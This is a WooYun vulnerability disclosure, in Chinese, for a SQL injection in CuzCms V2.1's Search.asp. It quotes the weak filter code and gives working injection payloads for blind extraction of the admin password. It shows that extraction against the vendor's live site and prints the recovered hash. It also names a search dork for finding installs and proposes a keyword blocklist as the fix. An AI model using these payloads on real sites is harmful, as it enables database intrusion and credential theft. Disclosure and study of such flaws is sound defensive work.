当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090778

漏洞标题:CuzCms最新版(V2.1正式版)及其以下版本SQL注入

相关厂商:CuzCms

漏洞作者: goubuli

提交时间:2015-01-12 16:27

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

CuzCms_V2.1及以下版本SQL注入

详细说明:

CuzCms成创网站内容管理系统由沈阳成创网络科技有限公司基于微软ASP、通用ACCESS/MSSQL数据库开发完成;
CuzCms在SQL注入基本都被过滤了
因为在Include\Conn.asp中包含了CheckSql函数
Conn.asp的47-101行:

'================================================
'函名:CheckSql
'作用:防止SQl注入
'================================================
Function CheckSql(Str)
If Str = "" Then
CheckSql = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"", 1, -1, 1)
Str = Replace(Str, """", """, 1, -1, 1)
Str = Replace(Str,"<","&lt;", 1, -1, 1)
Str = Replace(Str,">","&gt;", 1, -1, 1)
Str = Replace(Str, "script", "&#115;cript", 1, -1, 0)
Str = Replace(Str, "SCRIPT", "&#083;CRIPT", 1, -1, 0)
Str = Replace(Str, "Script", "&#083;cript", 1, -1, 0)
Str = Replace(Str, "script", "&#083;cript", 1, -1, 1)
Str = Replace(Str, "object", "&#111;bject", 1, -1, 0)
Str = Replace(Str, "OBJECT", "&#079;BJECT", 1, -1, 0)
Str = Replace(Str, "Object", "&#079;bject", 1, -1, 0)
Str = Replace(Str, "object", "&#079;bject", 1, -1, 1)
Str = Replace(Str, "applet", "&#097;pplet", 1, -1, 0)
Str = Replace(Str, "APPLET", "&#065;PPLET", 1, -1, 0)
Str = Replace(Str, "Applet", "&#065;pplet", 1, -1, 0)
Str = Replace(Str, "applet", "&#065;pplet", 1, -1, 1)
Str = Replace(Str, "[", "&#091;")
Str = Replace(Str, "]", "&#093;")
Str = Replace(Str, """", "", 1, -1, 1)
Str = Replace(Str, "=", "&#061;", 1, -1, 1)
Str = Replace(Str, "’", "’’", 1, -1, 1)
Str = Replace(Str, "select", "sel&#101;ct", 1, -1, 1)
Str = Replace(Str, "execute", "&#101xecute", 1, -1, 1)
Str = Replace(Str, "exec", "&#101xec", 1, -1, 1)
Str = Replace(Str, "join", "jo&#105;n", 1, -1, 1)
Str = Replace(Str, "union", "un&#105;on", 1, -1, 1)
Str = Replace(Str, "where", "wh&#101;re", 1, -1, 1)
Str = Replace(Str, "insert", "ins&#101;rt", 1, -1, 1)
Str = Replace(Str, "delete", "del&#101;te", 1, -1, 1)
Str = Replace(Str, "update", "up&#100;ate", 1, -1, 1)
Str = Replace(Str, "like", "lik&#101;", 1, -1, 1)
Str = Replace(Str, "drop", "dro&#112;", 1, -1, 1)
Str = Replace(Str, "create", "cr&#101;ate", 1, -1, 1)
Str = Replace(Str, "rename", "ren&#097;me", 1, -1, 1)
Str = Replace(Str, "count", "co&#117;nt", 1, -1, 1)
Str = Replace(Str, "chr", "c&#104;r", 1, -1, 1)
Str = Replace(Str, "mid", "m&#105;d", 1, -1, 1)
Str = Replace(Str, "truncate", "trunc&#097;te", 1, -1, 1)
Str = Replace(Str, "nchar", "nch&#097;r", 1, -1, 1)
Str = Replace(Str, "char", "ch&#097;r", 1, -1, 1)
Str = Replace(Str, "alter", "alt&#101;r", 1, -1, 1)
Str = Replace(Str, "cast", "ca&#115;t", 1, -1, 1)
Str = Replace(Str, "exists", "e&#120;ists", 1, -1, 1)
Str = Replace(Str,Chr(13),"<br>", 1, -1, 1)
CheckSql = Replace(Str,"’","’’", 1, -1, 1)
End Function


通常获取的参数都加了防SQL注入校验,如:SortID = CheckSql(Int(Request.Querystring("SortID")))
把代码都翻了一遍,发现在Search.asp中在获取参数KeyWord和Cuz时,未加入SQL校验。

KeyWord = Trim(Request("KeyWord"))
Cuz = Trim(Request("Cuz"))


然后代入查询:

datafrom="Cuz_"&Cuz
datawhere="where "&ItemRecT&" "
if SortID>0 then datawhere=datawhere&"and SortID="&SortID&" "
if KeyWord<>"" then datawhere=datawhere&"and Item1 like '%"&KeyWord&"%' "
taxis="order by ItemID desc "
sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere


但注入的利用需要构造,这里我把SQL执行的代码输出到页面,加入:
第一句SQL:

sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere
Response.Write "<font color=red>SQL1=>"&sql&"</font><br>"


第二句SQL:

sql="select ItemID from ["& datafrom &"] " & datawhere & taxis
Response.Write "<font color=red>SQL2=>"&sql&"</font><br>"


第三句SQL:

sql="select * from ["& datafrom &"] where ItemID in("& sqlid &") "&taxis
Response.Write "<font color=red>SQL3=>"&sql&"</font><br>"


输入一直关键字w正常查询为:

0108_1.png


输出的执行语句为:

SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%w%'


SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%w%' order by ItemID desc


SQL3=>select * from [Cuz_News] where ItemID in(69) order by ItemID desc


经过分析,利用关键字KeyWord处构造,POST提交以下代码(判断用户表行数>0):

Cuz=News&KeyWord=术'%20and%20IIF((select%20count(*)%20from%20Cuz_User)>0,1,0)%20and%20'a'<>'a


执行效果图如下:

0108_2.png


说明:如果构造不正确或者没有结果,那么只会显示SQL1的语句,即执行不成功。。。
如图

0108_3.png


显示0条数据

漏洞证明:

http://www.cuzcms.com/
搜索特征:powered by CuzCms

0108_4.png


获取管理员密码验证:

0108_5.png


执行语句:

SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%'
SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%' order by ItemID desc
SQL3=>select * from [Cuz_News] where ItemID in(71) order by ItemID desc


内容为:
7a57a5a743894a0e
真实数据为:

0108_6.png


验证完毕。。。

修复方案:

在NoSql.asp代码中增加:

N_In = "'|;|and|(|)|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare"


确保任何形式(Get、Post、Cookie)的参数被SQL过滤

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-01-12 16:29 | tnt1200 ( 普通白帽子 | Rank:121 漏洞数:17 | 关注飞机安全....)

    狗不理大神!

  2. 2015-01-12 16:50 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    大写绕过?

  3. 2015-01-12 17:28 | goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )

    @tnt1200 @HackBraid 都不是。。。利用位置比较诡异